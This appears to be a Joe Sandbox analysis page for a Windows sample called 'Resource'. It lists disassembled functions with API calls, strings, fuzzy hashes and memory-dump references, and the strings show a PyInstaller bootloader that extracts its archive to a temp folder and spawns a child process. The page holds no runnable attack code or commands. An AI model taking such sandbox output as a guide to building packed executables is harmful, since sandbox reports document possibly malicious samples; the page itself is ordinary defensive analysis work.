Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
Instruction ID: 4c568b934d46a0f98d2b2e5b9c14b5857409f8f292d2990d5e003d9501617b98
Opcode Fuzzy Hash: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
Instruction Fuzzy Hash: 4AD1D227A3822286EB20DF25DA507B96751EF84784F408135EA0ECB6C6DF3FE451C75A

Function 00007FF6E60C72BC Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6E60C6FF0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C7031
Part of subcall function 00007FF6E60C6FF0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C70AF
Part of subcall function 00007FF6E60C6FF0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C7100

CreateFileW.KERNELBASE ref: 00007FF6E60C73C2
CreateFileW.KERNEL32 ref: 00007FF6E60C7412
GetLastError.KERNEL32 ref: 00007FF6E60C7442
GetFileType.KERNELBASE ref: 00007FF6E60C7457
GetLastError.KERNEL32 ref: 00007FF6E60C7461
CloseHandle.KERNEL32 ref: 00007FF6E60C7494
CloseHandle.KERNEL32 ref: 00007FF6E60C75F7
CreateFileW.KERNEL32 ref: 00007FF6E60C762C
GetLastError.KERNEL32 ref: 00007FF6E60C763B

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
Instruction ID: 99d2ce4d52e97171e384ef33b961c4aaa580d0946cf0b929439f2235ec243fb1
Opcode Fuzzy Hash: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
Instruction Fuzzy Hash: 26C1A037B34A5285EB11CF68C5902AC3B61FB48BA8B114225DE2F9B3E5CF3AD456C315

Function 00007FF6E60A7950 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6E60A154F), ref: 00007FF6E60A79E7

Part of subcall function 00007FF6E60A7B60: GetEnvironmentVariableW.KERNEL32(00007FF6E60A3A1F), ref: 00007FF6E60A7B9A
Part of subcall function 00007FF6E60A7B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6E60A7BB7

Part of subcall function 00007FF6E60B7DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B7E05

SetEnvironmentVariableW.KERNEL32 ref: 00007FF6E60A7AA1

Part of subcall function 00007FF6E60A2B30: MessageBoxW.USER32 ref: 00007FF6E60A2C05

Strings

_MEI%d, xrefs: 00007FF6E60A79F5
TMP, xrefs: 00007FF6E60A79B0
LOADER: Failed to set the TMP environment variable., xrefs: 00007FF6E60A79CA
TMP, xrefs: 00007FF6E60A798A, 00007FF6E60A7A49, 00007FF6E60A7AD7

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
API String ID: 3752271684-1116378104
Opcode ID: 7055df51aa8baa9cea4d529d496e5c2017cf8e1c57129ce6875fbf4dd1c833c4
Instruction ID: 8e085805400ee341231e36f1a781c42e5101e55e1f6030421991943bef92edf4
Opcode Fuzzy Hash: 7055df51aa8baa9cea4d529d496e5c2017cf8e1c57129ce6875fbf4dd1c833c4
Instruction Fuzzy Hash: 0B51B167B3927341FD15A762AB113BA56515F88BD0F448431ED0ECB7DBEE2FE501820A

Function 00007FF6E60C65EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6E60C661A

Part of subcall function 00007FF6E60C5D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C5D7C

_get_daylight.LIBCMT ref: 00007FF6E60C662B

Part of subcall function 00007FF6E60C5D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C5D1C

_get_daylight.LIBCMT ref: 00007FF6E60C663C

Part of subcall function 00007FF6E60C5D38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C5D4C

Part of subcall function 00007FF6E60BAF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF22
Part of subcall function 00007FF6E60BAF0C: GetLastError.KERNEL32(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF2C

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6E60C687C), ref: 00007FF6E60C6663

Strings

Eastern Summer Time, xrefs: 00007FF6E60C6721
Eastern Standard Time, xrefs: 00007FF6E60C6709

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
Instruction ID: 9d30d4f7660e0b02fd88b2d8993569dec19d203cf954fb2d4dfb6aa5cc4ef8a6
Opcode Fuzzy Hash: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
Instruction Fuzzy Hash: FC51A633A3866286E720DF21DA807A97760FF48784F404635DA4EC7696DF3FE450875A

Function 00007FF6E60C0F38 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: fa36b354e42833f2d480c1905b01057773dd646869fd5786630cfbf194765c39
Instruction ID: d351c53ea56a3ae9da48ff146c625ec563778570c502adc7187217a1131f63e9
Opcode Fuzzy Hash: fa36b354e42833f2d480c1905b01057773dd646869fd5786630cfbf194765c39
Instruction Fuzzy Hash: FA02B023B3D67740FE61AB6197083792680AF41B90F048635DD6FCA7D6DE7FA411832A

Function 00007FF6E60A1710 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to create symbolic link %s!, xrefs: 00007FF6E60A1753
fopen, xrefs: 00007FF6E60A1797
fwrite, xrefs: 00007FF6E60A18EC
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6E60A1806
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6E60A18E5
pyi_arch_extract2fs was called before temporary directory was initialized!, xrefs: 00007FF6E60A1726
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6E60A1866
fread, xrefs: 00007FF6E60A18FC
Failed to extract %s: failed to open target file!, xrefs: 00007FF6E60A1790
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6E60A18F5
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6E60A17D9
fseek, xrefs: 00007FF6E60A180D
malloc, xrefs: 00007FF6E60A186D

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
API String ID: 2030045667-3833288071
Opcode ID: 58a8a0a2d0b9b9e18634d029908f9daef7cf58cf70176f6f913045e77eb385e3
Instruction ID: d45d585ffb3fdfa556e6d8fd07de1ca91770b874c57f92bb9fd22318353075dc
Opcode Fuzzy Hash: 58a8a0a2d0b9b9e18634d029908f9daef7cf58cf70176f6f913045e77eb385e3
Instruction Fuzzy Hash: F851D073B2866382EA109B11E6443B96390FF44BD4F444931EE0D8B696DF7FE244C70A

Function 00007FF6E60A8950 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(0000000100000001,00007FF6E60A414C,00007FF6E60A7911,?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A8990
OpenProcessToken.ADVAPI32(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A89A1
GetTokenInformation.KERNELBASE(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A89C3
GetLastError.KERNEL32(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A89CD
GetTokenInformation.KERNELBASE(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A8A0A
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6E60A8A1C
CloseHandle.KERNEL32(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A8A34
LocalFree.KERNEL32(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A8A66
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6E60A8A8D
CreateDirectoryW.KERNELBASE(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A8A9E

Strings

D:(A;;FA;;;%s), xrefs: 00007FF6E60A8A49
S-1-3-4, xrefs: 00007FF6E60A8A3F

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
String ID: D:(A;;FA;;;%s)$S-1-3-4
API String ID: 4998090-2855260032
Opcode ID: ab9c5a43b78f2aabbf64520a1e8ab8c22bfb93026fd8015a1f934939a7f50004
Instruction ID: ea9bc92c914b509a9baf538faacb4257858bbd806b47500e50e4bce337f384a6
Opcode Fuzzy Hash: ab9c5a43b78f2aabbf64520a1e8ab8c22bfb93026fd8015a1f934939a7f50004
Instruction Fuzzy Hash: CB41A13362879682EB10DF50F5447AA7361FB847A0F540231EA6E876E8DF3EE448C705

Function 00007FF6E60A1AA0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6E60A82B0: _fread_nolock.LIBCMT ref: 00007FF6E60A835A

_fread_nolock.LIBCMT ref: 00007FF6E60A1B54

Part of subcall function 00007FF6E60A2890: MessageBoxW.USER32 ref: 00007FF6E60A299B

Strings

MEI, xrefs: 00007FF6E60A1AE2
Could not allocate buffer for TOC!, xrefs: 00007FF6E60A1BD6
Could not read full TOC!, xrefs: 00007FF6E60A1C09
fread, xrefs: 00007FF6E60A1B66, 00007FF6E60A1C10
Error on file., xrefs: 00007FF6E60A1C36
fseek, xrefs: 00007FF6E60A1B33
Failed to read cookie!, xrefs: 00007FF6E60A1B5F
Failed to seek to cookie position!, xrefs: 00007FF6E60A1B2C
malloc, xrefs: 00007FF6E60A1BDD

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
API String ID: 677216364-1384898525
Opcode ID: 8083ddb759eabe566319bd50f493096f90f8369961efa69fb93b49b040603606
Instruction ID: 8bde2f530e9bd43afeeab9db6ce935cf2669bcd45e2f53299f72623545512319
Opcode Fuzzy Hash: 8083ddb759eabe566319bd50f493096f90f8369961efa69fb93b49b040603606
Instruction Fuzzy Hash: 8B51B173A2962286EB24CF28D64427833A0EF48BC4B548935D90DC7799DF7FE540CB4A

Function 00007FF6E60A8080 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6E60A8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8B1A

SetConsoleCtrlHandler.KERNEL32(00000000,00007FF6E60A3D52), ref: 00007FF6E60A80CF
GetStartupInfoW.KERNEL32 ref: 00007FF6E60A80EE

Part of subcall function 00007FF6E60BAA14: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60BAA28

Part of subcall function 00007FF6E60B8630: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B8697

GetCommandLineW.KERNEL32 ref: 00007FF6E60A818E
CreateProcessW.KERNELBASE ref: 00007FF6E60A81D0
WaitForSingleObject.KERNEL32 ref: 00007FF6E60A81E4
GetExitCodeProcess.KERNELBASE ref: 00007FF6E60A81F4

Strings

CreateProcessW, xrefs: 00007FF6E60A8207
Error creating child process!, xrefs: 00007FF6E60A8200

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Error creating child process!
API String ID: 2895956056-3524285272
Opcode ID: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
Instruction ID: 317def37816e1f8c49b81f930d4ea467224f163bc3be74941ca5366b919d0cde
Opcode Fuzzy Hash: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
Instruction Fuzzy Hash: F3417332A1878282DA20DB24E5553AAB364FF943A0F504335E6AE877D9DF7ED044CB05

Function 00007FF6E60A1000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6E60A3EC0: GetModuleFileNameW.KERNEL32(?,00007FF6E60A39EA), ref: 00007FF6E60A3EF1

SetDllDirectoryW.KERNEL32 ref: 00007FF6E60A3BE9

Part of subcall function 00007FF6E60A7B60: GetEnvironmentVariableW.KERNEL32(00007FF6E60A3A1F), ref: 00007FF6E60A7B9A
Part of subcall function 00007FF6E60A7B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6E60A7BB7

Strings

MEI, xrefs: 00007FF6E60A3B1B
_PYI_ONEDIR_MODE, xrefs: 00007FF6E60A3A34, 00007FF6E60A3A5F
Failed to convert DLL search path!, xrefs: 00007FF6E60A3BD1
_MEIPASS2, xrefs: 00007FF6E60A3A0B, 00007FF6E60A3A74, 00007FF6E60A3D22, 00007FF6E60A3D2E
Cannot side-load external archive %s (code %d)!, xrefs: 00007FF6E60A3B60
Cannot open PyInstaller archive from executable (%s) or external archive (%s), xrefs: 00007FF6E60A3AC6

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
API String ID: 2344891160-3602715111
Opcode ID: bd0b06326a7492ca6e80295eee68133b4651991604d025b60ce46eca4a378e7a
Instruction ID: 876631c0111c31308d09774e2e837645b8a46d1748284da3524090716de1ca28
Opcode Fuzzy Hash: bd0b06326a7492ca6e80295eee68133b4651991604d025b60ce46eca4a378e7a
Instruction Fuzzy Hash: 35B1C033B3C6A345EA69AB2196503BD5291BF647C4F404131EA4EC7796EF2FE501C70A

Function 00007FF6E60A1050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6E60A10F1
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6E60A111F
1.2.13, xrefs: 00007FF6E60A107E
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6E60A1249
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6E60A10B4
malloc, xrefs: 00007FF6E60A10F8, 00007FF6E60A1126

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Message
String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-1655038675
Opcode ID: bdb384c9e64b09cb6cdd26a0bda7559202b6569f1b531109b5fa3a90d9bcb5b2
Instruction ID: ea9620eea6b82eeff7a3b4b3f95c46e490f019282f5caa0c459c89ed62d3e10b
Opcode Fuzzy Hash: bdb384c9e64b09cb6cdd26a0bda7559202b6569f1b531109b5fa3a90d9bcb5b2
Instruction Fuzzy Hash: 8D51F033A286A285EA209F51E6443BA6291FF857D4F444531ED4EC7789EF3FE904C30A

Function 00007FF6E60BF1D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6E60BF56A,?,?,-00000018,00007FF6E60BB317,?,?,?,00007FF6E60BB20E,?,?,?,00007FF6E60B6452), ref: 00007FF6E60BF34C
GetProcAddress.KERNEL32(?,?,?,00007FF6E60BF56A,?,?,-00000018,00007FF6E60BB317,?,?,?,00007FF6E60BB20E,?,?,?,00007FF6E60B6452), ref: 00007FF6E60BF358

Strings

ext-ms-, xrefs: 00007FF6E60BF2A9
api-ms-, xrefs: 00007FF6E60BF296

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
Instruction ID: befc738353b9c88648b454e1f881a032ee9103db64f289d418ac3dc28bda752e
Opcode Fuzzy Hash: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
Instruction Fuzzy Hash: EF412323B39A6245FA15CB169A007752391BF44BE0F589135DD1EDB788DF3FE849830A

Function 00007FF6E60BC01C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60BC449

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9ca903b9cf5f984a890856c9b526cbfbbe81c083043c7d3df747fa7ce8575f70
Instruction ID: 1d1b55883714e21f2e1ff98c15a793c00131c8657e1d3dfd824b38cd36eb15ce
Opcode Fuzzy Hash: 9ca903b9cf5f984a890856c9b526cbfbbe81c083043c7d3df747fa7ce8575f70
Instruction Fuzzy Hash: 28C11633A2C7A791EBA19B5582003BD3754EF81B80F558131DA4E8739ACF7FE855830A

Function 00007FF6E60BD520 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6E60BD50B), ref: 00007FF6E60BD63C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6E60BD50B), ref: 00007FF6E60BD6C7

Memory Dump Source

